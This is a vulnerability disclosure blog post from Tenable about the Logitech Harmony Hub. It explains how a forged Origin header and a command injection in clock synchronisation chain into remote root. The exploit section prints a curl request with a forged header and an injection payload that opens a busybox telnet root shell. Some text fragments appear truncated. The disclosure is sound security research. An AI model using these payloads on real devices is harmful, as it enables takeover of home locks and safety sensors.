Owning the Smart Home with Logitech Harmony Hub

Joseph Bingham
Mar 3, 2019 · 5 min read


Logitech’s Harmony hub is a popular smart home device which enables communication with and control of all network connected devices in your house. It has an install base of millions of users across the globe and supports . Tenable recently released critical, undisclosed vulnerabilities that allow an attacker remote root access without user interaction.

The hub is a favorite among enthusiasts for its scripting and automation capability. As smart home functionality becomes more mainstream, controllers are becoming increasingly necessary to centralize functionality for the user. Amazon (), Google (), Apple (), and Logitech () all have products that offer centralized control of the various home devices from security systems to entertainment devices. Logitech’s Harmony is a popular choice, with a user base of at least seven figures. The nature of the smart home hub creates huge opportunity for an attacker. If they can control the hub, they get access to every device connected to the hub. Smart locks, the Apple TV, your Nest thermostat, even your smart refrigerator can be controlled by a remote attacker.

Image for post
Image for post
Logitech Harmony Hub app for Google and Apple

Exploring the device

The hub has several services open over 3 ports implementing XMPP, WebSocket, and a custom web API service. The services are all implemented in Lua, which will be discussed later on.

Image for post
Image for post
Nmap service scan for Logitech Harmony Hub

You can acquire the hub’s firmware during a device update and open it up fairly quickly. It contains a Linux kernel and squash filesystem with the application code on it. The application code is a large set of compiled Lua files which implement the hub’s services and functionality. You can decompile it using a of the to produce very human-readable source code.

Image for post
Image for post
Harmony firmware extraction

The application code is implemented in hundreds of well-organized compiled lua files. This code base implements all of the Harmony’s device logic and smart home related functionality. The device logic encompasses everything from authentication and user-management to firmware update and package control. The Harmony hub uses a messaging system, whereby functionality is implemented by handlers in the application code that can be called by Logitech’s remote servers when the user is controlling the hub with the smartphone app. These message handling functions control the life-blood of the device as the hub turns up the thermostat at night and unlocks your door when you get home. Of course, there is a protection mechanism to ensure that only trusted servers can make requests or use the protected message handling functions. The protection mechanism is flawed, however, allowing any remote attacker to bypass the security measures.

Image for post
Image for post
Functionality message handlers

What are the vulnerabilities? A brief description of the interesting vulns + why they work

The hub processes all network requests from remote hosts, but attempts to verify the origin before actually handling the request. This is a great security mechanism in theory; however, the attacker can easily forge the origin with a single line in the HTTP header. This allows any remote attacker to bypass the origin validation check, giving them access to all of the protected message handling functionality.

Image for post
Image for post
Vulnerable request origin checking function

One of the hub’s critical message handlers implements clock synchronization functionality. The hub sets its internal clock with a Linux shell command using the input from a trusted synchronization server. The input is passed directly to the operating system without sanitization.

Image for post
Image for post
Patch difference of command injection vulnerability

Exploiting the Vulnerabilities — Remote root

Looking back, we have two pieces to the attack so far:

  • Operating system command injection on the hub during a query to a trusted synchronization server
  • Access to all protected application message handling functionality from broken origin validation

To put these pieces together we perform an HTTP request to set the synchronization server to an attacker-controlled server. The hub will make a request to resynchronize its clock using the newly set server and the attacker and respond with the command injection payload to root the hub.

curl -d "{'cmd':'setup.account?provision',
-H "Origin: .myharmony.com"
-H "Content-Type: application/json"

HTTP request with forged origin to point device to attacker-controlled server


Device request for time server

{"utc":"0\";/bin/busybox telnetd -l/bin/sh -p9999;date -s \"0"}

Response from attacker controlled time server with command injection payload

Having fun after root

After the device is rooted, a remote attacker can access all smart devices connected to the hub. The attacker can modify Nest thermostat parameters, shut down home security motion or COx sensors, or unlock door deadbolts as shown below in my proof of concept.

Image for post
Image for post
Proof of concept — unlocking a deadbolt

Hub-style hardware will always be an attractive target for attackers since they connect many devices through one single product. For this reason, bugs in these products end up being much more critical than bugs in individual IoT devices. These types of hub devices should be held to a higher security standard than other devices to make attacking them more difficult and less attractive.

Tenable TechBlog

Learn how Tenable finds new vulnerabilities and writes the…

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store